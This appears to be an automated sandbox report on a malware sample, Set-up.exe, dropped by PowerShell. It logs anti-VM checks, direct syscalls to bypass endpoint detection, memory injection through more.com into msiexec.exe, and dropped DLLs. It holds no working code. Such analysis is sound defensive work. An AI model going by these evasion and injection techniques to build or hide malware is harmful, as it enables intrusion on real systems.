Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\msiexec.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	API/Special instruction interceptor: Address: 6B847C44
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	API/Special instruction interceptor: Address: 6B847945
Source: C:\Windows\SysWOW64\more.com	API/Special instruction interceptor: Address: 6B843B54
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: C1BC87

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5402	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4291	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1936	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 986	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

API coverage: 0.3 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3620	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2764	Thread sleep count: 1936 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2764	Thread sleep count: 986 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6BB781A1
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	3_2_6BBAC8FD
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	3_2_6BBACC23

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BB9BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,

3_2_6BB9BE38

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: VMware
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: Set-up.exe, 00000003.00000003.1953031155.00000000042F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: Set-up.exe, 00000003.00000002.1985522223.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmp	Binary or memory string: ld'&l.?AVQEmulationPaintEngine@@0/
Source: Set-up.exe, 00000003.00000003.1953031155.00000000042F3000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1985522223.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

API call chain: ExitProcess graph end node

graph_3-20421

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BB607A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

3_2_6BB607A7

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

3_2_6BBDB5A7

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BBD9B6F __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__doserrno,_errno,__lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,__lseeki64_nolock,

3_2_6BBD9B6F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB607A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_6BB607A7
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBDAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	3_2_6BBDAD2C
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 8_2_6C147FC2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	8_2_6C147FC2

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	NtSetInformationThread: Direct from: 0x6C4562B9	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	NtProtectVirtualMemory: Direct from: 0x76EF63E1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read write			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: C19330			Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: B80008			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior

Source: Set-up.exe, 00000003.00000002.1985326193.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp, Set-up.exe, 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp

Binary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect

